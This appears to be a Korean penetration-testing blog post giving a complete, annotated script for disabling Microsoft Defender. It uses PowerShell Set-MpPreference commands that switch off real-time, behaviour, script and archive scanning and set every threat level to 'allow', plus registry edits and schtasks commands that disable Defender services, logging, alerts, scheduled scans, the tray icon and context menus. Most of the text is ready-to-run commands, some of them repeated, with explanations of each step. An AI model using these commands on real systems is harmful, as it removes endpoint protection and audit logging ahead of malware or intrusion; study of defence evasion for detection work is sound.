Powershell 이용
: cmd에서 powershell을 실행
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6 -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6 -ErrorAction Ignore;
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6 -ErrorAction Ignore;
option
- 1 : 검색된 위협을 정리
- 2 : 검색된 위협을 격리
- 4 : 검색된 위협을 제거
- 6 : 검색된 위협을 허용
- 8 : 사용자가 검색된 위협과 함께 수행할 작업을 확인하도록 허용
- 9 : 작업을 수행하지 않음
- 10 : 검색된 위협을 차단
- NULL : 업데이트 정의에 따라 작업을 적용. Default값
1. Set-MpPreference -DisableRealtimeMonitoring $true
Microsoft Defender의 실시간 보호 기능을 비활성화.
실시간 보호는 파일 및 프로그램의 실시간 악성코드 검사 역할을 수행한다.
2. Set-MpPreference -DisableBehaviorMonitoring $true
동작 기반 탐지 기능을 비활성화.
동작 기반 탐지는 파일이나 프로그램의 비정상적 활동을 모니터링하여 악성 행위를 탐지한다.
3. Set-MpPreference -DisableBlockAtFirstSeen $true
Defender가 새롭게 탐지된 악성코드 또는 의심 파일을 초기 실행 시 차단하는 기능을 비활성화.
4. Set-MpPreference -DisableIOAVProtection $true
인터넷 다운로드 파일의 스캔(입출력 바이러스 방지 기능)을 비활성화.
IOAVProtection은 다운로드 파일에 포함된 악성코드를 탐지하는 중요한 역할을 한다.
5. Set-MpPreference -DisablePrivacyMode $true
프라이버시 모드를 비활성화하여 Microsoft Defender가 민감 데이터를 보호하지 않도록 설정.
6. Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
엔진이 없을 경우 시작 시 악성코드 서명 업데이트를 비활성화.
엔진이 없으면 업데이트가 이루어지지 않으므로 악성코드 탐지 능력이 크게 떨어진다.
7. Set-MpPreference -DisableArchiveScanning $true
압축 파일(ZIP, RAR 등) 내부의 파일 스캔을 비활성화.
8. Set-MpPreference -DisableIntrusionPreventionSystem $true
침입 방지 시스템을 비활성화.
침입 방지 시스템은 네트워크 기반 위협을 탐지하고 차단하는 데 사용된다.
9. Set-MpPreference -DisableScriptScanning $true
스크립트 파일(VBS, JavaScript 등)에 대한 스캔을 비활성화.
스크립트 기반 악성코드를 탐지하는 기능이 중단된다.
10. Set-MpPreference -SubmitSamplesConsent 2
Defender가 샘플 파일을 Microsoft에 제출하는 방식을 설정.
값 2는 "샘플 제출 비활성화"를 의미.
11. Set-MpPreference -MAPSReporting 0
Microsoft Advanced Protection Service(MAPS)의 보고 기능을 비활성화.
MAPS는 악성코드 및 위협 데이터를 Microsoft와 공유하여 탐지 기능을 향상시킨다.
12. Set-MpPreference -HighThreatDefaultAction 6 -Force
높은 수준의 위협에 대해 기본 동작을 "허용(6)"으로 설정.
13. Set-MpPreference -ModerateThreatDefaultAction 6
중간 수준의 위협에 대해 기본 동작을 "허용(6)"으로 설정.
14. Set-MpPreference -LowThreatDefaultAction 6
낮은 수준의 위협에 대해 기본 동작을 "허용(6)"으로 설정.
15. Set-MpPreference -SevereThreatDefaultAction 6
심각한 수준의 위협에 대해 기본 동작을 "허용(6)"으로 설정.
Registry 편집
rem registry initalizing
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
rem Disable Real-time protection
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
rem User Alert and Spynet
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
rem 0 - Disable Logging
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
rem Disable WD Tasks
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
rem Disable WD systray icon
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
rem Remove WD context menu
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
rem Disable WD services
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem Run "Disable WD.bat" again to disable WD services
레지스트리 초기화 및 주요 설정
reg delete 및 reg add 사용
1. reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
- Defender의 정책 레지스트리 키를 삭제.
- 모든 기존 정책 설정을 초기화.
- /f: 사용자 확인 없이 강제 삭제.
2. reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
- AntiSpyware 기능을 비활성화.
- 1: 비활성화 상태.
- /t REG_DWORD: 값 유형은 DWORD.
3. reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
- Defender의 바이러스 탐지 및 방어 기능을 비활성화.
4. reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0"
- /f
- PUP(Potentially Unwanted Program) 감지를 비활성화.
- PUP는 원하지 않는 프로그램을 탐지하는 기능.
ram Initalizing WD Settiong
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
실시간 보호 비활성화
reg add 명령을 통한 비활성화
HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection
, , , 등
- Defender의 다양한 실시간 보호 기능 비활성화:
1. DisableBehaviorMonitoring
- 동작 기반 모니터링 비활성화
- /t REG_DWORD /d "1" /f
2. DisableIOAVProtection
- 다운로드 파일 검사 비활성화
- /t REG_DWORD /d "1" /f
3. DisableOnAccessProtection
- 사용자의 컴퓨터에서 파일 및 프로그램 활동 모니터링 비활성화
- /t REG_DWORD /d "1" /f
4. DisableRealtimeMonitoring
- 사용자의 컴퓨터에서 파일 및 프로그램 활동 모니터링 비활성화
- /t REG_DWORD /d "1" /f
5. DisableScanOnRealtimeEnable
- 실시간 보호가 활성화될 때 수행되는 즉시 검사를 비활성화.
- /t REG_DWORD /d "1" /f
rem 1 - Disable Real-time protection
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
사용자 알림 및 스파이넷 관련 설정
1. DisableEnhancedNotifications
- "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting"
- 강화된 사용자 알림 기능을 비활성화.
- 경고와 알림이 사용자에게 전달되지 않음.
2. DisableBlockAtFirstSeen
- "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet"
- 처음 탐지된 악성코드 차단을 비활성화.
3. SpynetReporting 및 SubmitSamplesConsent
- "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet"
- Microsoft SpyNet과 샘플 제출 기능을 비활성화.
- Microsoft Active Protection Service(MAPS) 가입 비활성화
- SpyNet은 위협 데이터를 Microsoft에 전송해 분석하는 기능.
- /t REG_DWORD /d "1" /f
ram Alert and Spynet
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
로그 비활성화
1.DefenderApiLogge
- Defender API 로그를 비활성화.
- /d "0": 로그 생성을 중단.
- "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
2. DefenderAuditLogger
- Defender 감사 로그를 비활성화.
- /d "0": 로그 생성을 중단
- "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
rem 0 - Disable Logging
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
Windows Defender 관련 태스크(예약) 비활성화
- schtasks 명령어 사용 --> 예약기능 관련 명령어
- schtasks /Change /TN --> 작업이 실행되는 예약 프로그램 대상
- Windows Defender에서 예약된 태스크를 비활성화.
- 비활성화되는 태스크:
- ExploitGuard MDM 정책 새로 고침
- 캐시 유지 관리
- 클린업
- 정기 스캔
- 검증
rem Disable WD Tasks
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
WD 시스템 트레이 아이콘 제거
- reg delete 명령어 사용
- Windows Defender 아이콘 제거
- HKLM 및 HKCU에서 관련 키 삭제.
- 시스템 트레이에서 Windows Defender 아이콘이 사라진다.
rem Disable WD systray icon
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
컨텍스트 메뉴 제거
- reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP"
- 파일, 디렉터리, 드라이브의 컨텍스트 메뉴에서 Windows Defender 옵션 제거.
- 컨텍스트 메뉴 : GUI 우클릭시 뜨는 메뉴
rem Remove WD context menu
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
Windows Defender 서비스 비활성화
- 레지스트리 및 서비스 상태 변경
- reg add "HKLM\System\CurrentControlSet\Services\..." /v "Start" /t REG_DWORD /d "4" /f
- 다양한 Defender 관련 서비스의 시작 유형을 비활성화로 설정(4):
- 0 : boot
- 1 : system
- 2 : Autometic
- 3 : Manual
- 4 : Disabled
- Services:
- WdBoot: 부팅 시 악성코드 검사.
- WdFilter: 파일 필터링.
- WdNisDrv: 네트워크 침입 방지 시스템(NIS) 드라이버.
- WdNisSvc: NIS 서비스.
- WinDefend: 기본 Defender 서비스.
- SecurityHealthService: 보안 상태 관리.
rem Disable WD services
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
'모의해킹 및 보안' 카테고리의 다른 글
| 코드 분석(디버깅) (0) | 2024.11.26 |
|---|---|
| CMD를 통한 Postexploit (0) | 2024.11.26 |
| MSF_venom (0) | 2024.11.25 |
| fail2ban (0) | 2024.11.21 |
| Portsentry (0) | 2024.11.21 |
